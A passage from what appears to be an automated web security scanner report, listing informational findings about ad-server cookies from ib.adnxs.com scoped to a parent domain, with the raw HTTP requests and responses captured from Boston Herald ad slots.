Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:P4x>H+=q5PufidQD2]*](K9'9kOYZb

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 14:14:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 14:14:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 14:14:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 14:14:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:P4x>H+=q5PufidQD2]*](K9'9kOYZb; path=/; expires=Thu, 28-Apr-2011 14:14:50 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Fri, 28 Jan 2011 14:14:50 GMT

GIF89a.............!.......,........@..L..;

10.65. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-84139438_1296253138%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D47567%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.ent_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.7543001882731915%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb458625=5_[r^208WMuF4Lw)IE.8*M4Bc?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP8BW6sqWS4UpBWHfHSmrEELbP0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEkgQBAgUCAAIAAAAAUyJEQAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252891%29%3Buf%28%27r%27%2C+151403%2C+1296252891%29%3Bppv%2882%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2884%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2811%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2882%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2884%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2887%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3Bppv%28619%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3Bppv%28620%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3Bppv%28621%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb458625=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb734371=5_[r^208WMM2x@N!@@-#c5UK9?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP-1DpNaIIcFyBWHfHSmrEEKCcENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEQgcBAgUCAAIAAAAAJiN9fwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265346%29%3Buf%28%27r%27%2C+116344%2C+1296265346%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 29 Jan 2011 01:42:26 GMT
Content-Length: 832

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-84139438_1296253138,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.66. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Fnews%2Fregional%2Fview%2F20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist%2Fsrvc%3Dhome%26position%3D4&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D853654%3Bcontx%3Dpolit%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.5569272553548217%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb402178=5_[r^208WMuF4Lw)IE.8)Oje[?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxfdyj3sNwc8BWHfHSmrEELYO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AYBAgUCAAIAAAAAwCFK9AAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251864%29%3Buf%28%27r%27%2C+151403%2C+1296251864%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2811%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2887%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28619%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28620%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28621%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:42:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb402178=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb918937=5_[r^208WMM2x@N!@@-#at>$5?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP6yB-4ble5ZuBWHfHSmrEEJ-cENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE-gYBAgUCAAIAAAAAZSS2ugAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265342%29%3Buf%28%27r%27%2C+116344%2C+1296265342%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:22 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 29 Jan 2011 01:42:22 GMT
Content-Length: 521

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-61525102_1296251877,11d765b6a10b1b3,polit,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-c
...[SNIP]...

10.67. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-61892947_1296253385%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.weath_l-cm.sports_h-cm.ent_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D54892%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.ent_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.6713631898164749%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb322141=5_[r^208WMZzhw!0nf8M'VILZ?enc=AAAAAAAA4D_NzMzMzMzcPwAAAKCZmQFAzczMzMzM3D8AAAAAAADgP8QzzGlufgMIBWHfHSmrEELSQENNAAAAACQ9AwA3AQAAbAEAAAIAAACDbAIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AUBAgUCAAIAAAAAUCD5SgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+8044%2C+1296253138%29%3Buf%28%27c%27%2C+43438%2C+1296253138%29%3Buf%28%27g%27%2C+18638%2C+1296253138%29%3Buf%28%27r%27%2C+158851%2C+1296253138%29%3Bppv%288484%2C+%27577444189920048068%27%2C+1296253138%2C+1296857938%2C+43438%2C+24319%29%3Bppv%288484%2C+%27577444189920048068%27%2C+1296253138%2C+1296857938%2C+43438%2C+24319%29%3B&cnd=!wRdxQwiu0wIQg9kJGAAg_70BKNQJMQAAAAAAAOA_QhMIABAAGAAgASj-__________8BQgsIpEIQABgAIAMoAUILCKRCEAAYACACKAFIAVAAWKoDYABo7AI.; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:42:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb322141=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb130500=5_[r^208WMM2x@N!@@-#cn5^<?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP1oKi6Mn921PBWHfHSmrEEKEcENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEHAcBAgUCAAIAAAAA6CFsHQAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265348%29%3Buf%28%27r%27%2C+116344%2C+1296265348%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:28 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 29 Jan 2011 01:42:28 GMT
Content-Length: 832

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-61892947_1296253385,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.68. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-51832465_1296253632%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D302941%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.ent_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.9211412204895169%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb502322=5_[r^208WMuF4Lw)IE.8#`^VR?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP6BgySx3_8JEBWHfHSmrEELJQUNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEnQMBAgUCAAIAAAAAZSKqQQAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296253385%29%3Buf%28%27r%27%2C+151403%2C+1296253385%29%3Bppv%2882%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2884%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2811%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2882%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2884%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2887%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3Bppv%28619%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3Bppv%28620%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3Bppv%28621%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; 